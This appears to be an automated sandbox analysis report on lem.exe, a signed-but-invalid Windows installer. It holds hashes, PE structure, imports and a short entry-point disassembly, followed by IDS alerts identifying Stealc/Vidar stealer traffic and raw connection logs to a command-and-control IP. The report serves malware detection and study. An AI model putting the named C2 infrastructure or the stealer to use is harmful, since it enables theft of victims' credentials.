                                                                                                                                                                                                                                                                                          SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                          SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                          SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                          Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):132999
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.435805366369722
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:fjktv3zg+newH5FsYZGFsxIo9Le13y2i6o:f+vn/H/MFsxIo9Y3y8o
                                                                                                                                                                                                                                                                                          MD5:0ADB316E991FF77FFCC86AD3A73FF407
                                                                                                                                                                                                                                                                                          SHA1:DAA21DED5E09F2462521B7B2AFD90C6AA4B18B46
                                                                                                                                                                                                                                                                                          SHA-256:1484F790060E14AD6C37A82CC6D7937BCBD1A3FCF268F75F74007281E693BE13
                                                                                                                                                                                                                                                                                          SHA-512:ACE571CC39835255BE768288456ABCE6426DBACBC637074A548EC4552C1413EDD739E1464CBC7F34B881F09CC8584637CC97B91716F15863EB01D9B1FD83A2A0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                          Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.
                                                                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.973423478278547
                                                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                          File name:lem.exe
                                                                                                                                                                                                                                                                                          File size:978'099 bytes
                                                                                                                                                                                                                                                                                          MD5:27b18a5e8bdaa950af93633a821c2bfa
                                                                                                                                                                                                                                                                                          SHA1:5763fb49a0dcdb77959cf503f008b6f863c1e92d
                                                                                                                                                                                                                                                                                          SHA256:b9c936992c244ab9864cf92bfe3365f7316b306846a4827aa91740da78dee813
                                                                                                                                                                                                                                                                                          SHA512:eeaa5cd8ff38655b8c4c1105d05862722b660e5eb2a9c74cc08d6eb3d5678ba8803abd3d0f6cd62b3a385017c19373da87bf0f1093a5aeaabac8777fa0c2a144
                                                                                                                                                                                                                                                                                          SSDEEP:24576:pwalP8xAuX4r2UW6hFgpnzmhmwMpG/lhX1/tnn2K2:5LWjcFDtv1/tnn2K2
                                                                                                                                                                                                                                                                                          TLSH:9E25236B6BA5C93EEF822E315172BA6B51B9F6500C24D64FE314FCCF78376410D28A52
                                                                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...(...B...8.....
                                                                                                                                                                                                                                                                                          Icon Hash:ccb2b1313133b2cc
                                                                                                                                                                                                                                                                                          Entrypoint:0x4038af
                                                                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                                                                          Digitally signed:true
                                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                          Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                                                                          File Version Major:5
                                                                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                          Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                                                                                                                                                                                                          Signature Valid:false
                                                                                                                                                                                                                                                                                          Signature Issuer:CN=VeriSign Class 3 Code Signing 2009-2 CA, OU=Terms of use at https://www.verisign.com/rpa (c)09, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
                                                                                                                                                                                                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                                          Error Number:-2146869232
                                                                                                                                                                                                                                                                                          Not Before, Not After
                                                                                                                                                                                                                                                                                          • 01/07/2010 20:00:00 02/07/2011 19:59:59
                                                                                                                                                                                                                                                                                          Subject Chain
                                                                                                                                                                                                                                                                                          • CN=USBlyzer, OU=Digital ID Class 3 - Microsoft Software Validation v2, O=USBlyzer, L=St. Petersburg, S=St. Petersburg, C=RU
                                                                                                                                                                                                                                                                                          Version:3
                                                                                                                                                                                                                                                                                          Thumbprint MD5:75297C190C025C7A82B15677D333560E
                                                                                                                                                                                                                                                                                          Thumbprint SHA-1:86E18A81B94E1011C5D3E1E60789AAACCF36704A
                                                                                                                                                                                                                                                                                          Thumbprint SHA-256:1E9B8DE53D2F7273D2C9CBBF7AA2382E1A6C2141774B5C41FFE26E60A0F07CC9
                                                                                                                                                                                                                                                                                          Serial:62FCC26A7F4A434259B8883B05A42C28
                                                                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                                                                          sub esp, 000002D4h
                                                                                                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                                                                                          push edi
                                                                                                                                                                                                                                                                                          push 00000020h
                                                                                                                                                                                                                                                                                          xor ebp, ebp
                                                                                                                                                                                                                                                                                          pop esi
                                                                                                                                                                                                                                                                                          mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                                                          mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                                                                          mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                                                          call dword ptr [00409030h]
                                                                                                                                                                                                                                                                                          push 00008001h
                                                                                                                                                                                                                                                                                          call dword ptr [004090B4h]
                                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                                          call dword ptr [004092C0h]
                                                                                                                                                                                                                                                                                          push 00000008h
                                                                                                                                                                                                                                                                                          mov dword ptr [0047EB98h], eax
                                                                                                                                                                                                                                                                                          call 00007EFC808CA89Bh
                                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                                          push 000002B4h
                                                                                                                                                                                                                                                                                          mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                                                                                                                          lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                                          push 0040A264h
                                                                                                                                                                                                                                                                                          call dword ptr [00409184h]
                                                                                                                                                                                                                                                                                          push 0040A24Ch
                                                                                                                                                                                                                                                                                          push 00476AA0h
                                                                                                                                                                                                                                                                                          call 00007EFC808CA57Dh
                                                                                                                                                                                                                                                                                          call dword ptr [004090B0h]
                                                                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                                                                          mov edi, 004CF0A0h
                                                                                                                                                                                                                                                                                          push edi
                                                                                                                                                                                                                                                                                          call 00007EFC808CA56Bh
                                                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                                                          call dword ptr [00409134h]
                                                                                                                                                                                                                                                                                          cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                                                                                                                                          mov dword ptr [0047EAB8h], eax
                                                                                                                                                                                                                                                                                          mov eax, edi
                                                                                                                                                                                                                                                                                          jne 00007EFC808C7E6Ah
                                                                                                                                                                                                                                                                                          push 00000022h
                                                                                                                                                                                                                                                                                          pop esi
                                                                                                                                                                                                                                                                                          mov eax, 004CF0A2h
                                                                                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                                                                          call 00007EFC808CA241h
                                                                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                                                                          call dword ptr [00409260h]
                                                                                                                                                                                                                                                                                          mov esi, eax
                                                                                                                                                                                                                                                                                          mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                                                                          jmp 00007EFC808C7EF3h
                                                                                                                                                                                                                                                                                          push 00000020h
                                                                                                                                                                                                                                                                                          pop ebx
                                                                                                                                                                                                                                                                                          cmp ax, bx
                                                                                                                                                                                                                                                                                          jne 00007EFC808C7E6Ah
                                                                                                                                                                                                                                                                                          add esi, 02h
                                                                                                                                                                                                                                                                                          cmp word ptr [esi], bx
                                                                                                                                                                                                                                                                                          Programming Language:
                                                                                                                                                                                                                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                          • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                          • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                          • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                          • [LNK] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000xb756.rsrc
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0xed26b0x1a48.ndata
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                          .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                          .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                          .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                          .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                          .rsrc0x1000000xb7560xb80053aef6a586de78fe8545f921ffa8daf0False0.8768894361413043data7.603397864273553IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                          .reloc0x10c0000xfd60x1000b65596335bd7a274d18b2143543f8eafFalse0.59765625data5.58889695963986IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                          RT_ICON0x1001f00x68d9PNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9950076375693901
                                                                                                                                                                                                                                                                                          RT_ICON0x106acc0x209fPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0013172075200574
                                                                                                                                                                                                                                                                                          RT_ICON0x108b6c0x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.5272579332790887
                                                                                                                                                                                                                                                                                          RT_DIALOG0x10b1d40x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                                                                                                          RT_DIALOG0x10b2d40x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                                                                                                          RT_DIALOG0x10b3f00x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                                                                                                          RT_GROUP_ICON0x10b4500x30dataEnglishUnited States0.8958333333333334
                                                                                                                                                                                                                                                                                          RT_MANIFEST0x10b4800x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                                                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                                                                                          KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                                                                                                                                                                          USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                                                                                                                                                          GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                                                                                                                                                          SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                                                                                                                                                          ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                                                                                                                                                                          COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                                                                                                                          ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                                                                                                                                                          VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                                                                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                          EnglishUnited States
                                                                                                                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                          2024-12-15T20:47:34.861412+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST1192.168.2.449742116.203.12.241443TCP
                                                                                                                                                                                                                                                                                          2024-12-15T20:47:37.153833+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1116.203.12.241443192.168.2.449743TCP
                                                                                                                                                                                                                                                                                          2024-12-15T20:47:39.457532+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M11116.203.12.241443192.168.2.449744TCP
                                                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:03.820225954 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:21.802925110 CET4972380192.168.2.42.20.68.201
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:21.923854113 CET80497232.20.68.201192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:21.923945904 CET4972380192.168.2.42.20.68.201
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:25.391431093 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:25.391488075 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:25.391556025 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:25.421597004 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:25.421633005 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:26.811956882 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:26.812151909 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:27.043165922 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:27.043222904 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:27.044351101 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:27.044517994 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:27.049325943 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:27.095338106 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:27.488455057 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:27.488492966 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:27.488578081 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:27.488630056 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:27.488742113 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:27.488742113 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:27.488742113 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:27.491027117 CET49738443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:27.491099119 CET44349738149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:27.645077944 CET49740443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:27.645118952 CET44349740116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:27.645253897 CET49740443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:27.645644903 CET49740443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:27.645658016 CET44349740116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:29.530391932 CET44349740116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:29.530505896 CET49740443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:29.545217037 CET49740443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:29.545234919 CET44349740116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:29.546135902 CET44349740116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:29.546210051 CET49740443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:29.546606064 CET49740443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:29.591340065 CET44349740116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:30.233788967 CET44349740116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:30.233882904 CET49740443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:30.233901024 CET44349740116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:30.233958006 CET44349740116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:30.234041929 CET49740443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:30.234041929 CET49740443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:30.236413956 CET49740443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:30.236430883 CET44349740116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:30.238020897 CET49741443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:30.238082886 CET44349741116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:30.238203049 CET49741443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:30.238377094 CET49741443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:30.238399029 CET44349741116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:31.646975994 CET44349741116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:31.647070885 CET49741443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:31.647537947 CET49741443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:31.647553921 CET44349741116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:31.649679899 CET49741443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:31.649692059 CET44349741116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:32.533415079 CET44349741116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:32.533570051 CET44349741116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:32.533608913 CET49741443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:32.533651114 CET49741443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:32.533777952 CET49741443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:32.533801079 CET44349741116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:32.535232067 CET49742443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:32.535270929 CET44349742116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:32.535381079 CET49742443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:32.535558939 CET49742443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:32.535573959 CET44349742116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:33.943347931 CET44349742116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:33.943412066 CET49742443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:33.943970919 CET49742443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:33.943981886 CET44349742116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:33.946005106 CET49742443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:33.946011066 CET44349742116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:34.861447096 CET44349742116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:34.861502886 CET44349742116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:34.861526966 CET49742443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:34.861548901 CET44349742116.203.12.241192.168.2.4
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:34.861562967 CET49742443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:34.861588955 CET49742443192.168.2.4116.203.12.241
                                                                                                                                                                                                                                                                                          Dec 15, 2024 20:47:34.861596107 CET44349742116.203.12.241192.168.2.4
